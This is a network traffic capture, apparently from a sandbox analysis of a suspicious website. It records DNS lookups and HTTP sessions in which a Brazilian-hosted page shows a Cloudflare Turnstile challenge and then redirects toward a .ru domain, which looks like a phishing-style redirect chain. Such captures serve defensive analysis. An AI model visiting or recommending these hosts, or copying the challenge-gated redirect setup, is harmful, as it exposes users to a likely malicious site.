                                                                                  Jan 15, 2025 03:00:36.074371099 CET1.1.1.1192.168.2.40x57bdNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:36.074371099 CET1.1.1.1192.168.2.40x57bdNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:36.075221062 CET1.1.1.1192.168.2.40xd297No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:37.582624912 CET1.1.1.1192.168.2.40x90d3No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:37.582624912 CET1.1.1.1192.168.2.40x90d3No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:37.582807064 CET1.1.1.1192.168.2.40x9d92No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:47.400538921 CET1.1.1.1192.168.2.40xbaabNo error (0)qelira.qelirathor.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:47.400538921 CET1.1.1.1192.168.2.40xbaabNo error (0)qelira.qelirathor.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:47.502156019 CET1.1.1.1192.168.2.40x492eNo error (0)qelira.qelirathor.ru65IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:49.093878031 CET1.1.1.1192.168.2.40x7977No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:49.093878031 CET1.1.1.1192.168.2.40x7977No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:49.093878031 CET1.1.1.1192.168.2.40x7977No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:49.093878031 CET1.1.1.1192.168.2.40x7977No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:49.896533966 CET1.1.1.1192.168.2.40xcec1No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:49.896533966 CET1.1.1.1192.168.2.40xcec1No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:49.896533966 CET1.1.1.1192.168.2.40xcec1No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:49.896533966 CET1.1.1.1192.168.2.40xcec1No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:50.556967974 CET1.1.1.1192.168.2.40x7bb4No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                  • aifunygg.planaltinashopping.com.br
                                                                                  • https:
                                                                                    • challenges.cloudflare.com
                                                                                    • qelira.qelirathor.ru
                                                                                    • code.jquery.com
                                                                                  • a.nel.cloudflare.com
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.449754108.179.252.844438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:27 UTC677OUTGET / HTTP/1.1
                                                                                  Host: aifunygg.planaltinashopping.com.br
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-User: ?1
                                                                                  Sec-Fetch-Dest: document
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:28 UTC208INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 01:58:27 GMT
                                                                                  Server: Apache
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade, close
                                                                                  Vary: Accept-Encoding
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  2025-01-15 01:58:28 UTC624INData Raw: 32 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 6a
                                                                                  Data Ascii: 264<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Document</title><style> div { display: flex; align-items: center; j


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.449755108.179.252.844438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:28 UTC560OUTGET /main.js HTTP/1.1
                                                                                  Host: aifunygg.planaltinashopping.com.br
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://aifunygg.planaltinashopping.com.br/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:28 UTC267INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 01:58:28 GMT
                                                                                  Server: Apache
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade, close
                                                                                  Last-Modified: Mon, 13 Jan 2025 20:05:45 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 327
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Type: application/javascript
                                                                                  2025-01-15 01:58:28 UTC327INData Raw: 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 74 75 72 6e 73 74 69 6c 65 2e 72 65 6e 64 65 72 28 27 23 6d 79 57 69 64 67 65 74 27 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 73 69 74 65 6b 65 79 3a 20 27 30 78 34 41 41 41 41 41 41 41 35 4f 4b 49 7a 46 31 74 31 7a 6b 48 64 36 27 2c 0d 0a 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 3a 20 66 75 6e 63 74 69 6f 6e 28 74 6f 6b 65 6e 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 43 68 61 6c 6c 65 6e 67 65 20 53 75 63 63 65 73 73 20 24 7b 74 6f 6b 65 6e 7d 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65
                                                                                  Data Ascii: window.onloadTurnstileCallback = function () { turnstile.render('#myWidget', { sitekey: '0x4AAAAAAA5OKIzF1t1zkHd6', callback: function(token) { console.log('Challenge Success ${token}'); window.location.hre


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.449756104.18.94.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:29 UTC593OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://aifunygg.planaltinashopping.com.br/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:29 UTC386INHTTP/1.1 302 Found
                                                                                  Date: Wed, 15 Jan 2025 01:58:29 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                  cross-origin-resource-policy: cross-origin
                                                                                  location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902242d0bf7a425b-EWR
                                                                                  alt-svc: h3=":443"; ma=86400


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.449757104.18.94.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:29 UTC577OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://aifunygg.planaltinashopping.com.br/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:29 UTC471INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 01:58:29 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Content-Length: 47521
                                                                                  Connection: close
                                                                                  accept-ranges: bytes
                                                                                  last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                  access-control-allow-origin: *
                                                                                  cross-origin-resource-policy: cross-origin
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902242d48d0943c8-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 01:58:29 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                  Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                  2025-01-15 01:58:29 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                  Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                  2025-01-15 01:58:29 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                  Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                  2025-01-15 01:58:29 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                  2025-01-15 01:58:29 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                  Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                  2025-01-15 01:58:29 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                                  Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                                  2025-01-15 01:58:29 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                                  Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                                  2025-01-15 01:58:29 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                  Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                                  2025-01-15 01:58:29 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                                  Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                                  2025-01-15 01:58:29 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                                  Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.449758108.179.252.844438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:30 UTC365OUTGET /main.js HTTP/1.1
                                                                                  Host: aifunygg.planaltinashopping.com.br
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:30 UTC267INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 01:58:30 GMT
                                                                                  Server: Apache
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade, close
                                                                                  Last-Modified: Mon, 13 Jan 2025 20:05:45 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 327
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Type: application/javascript
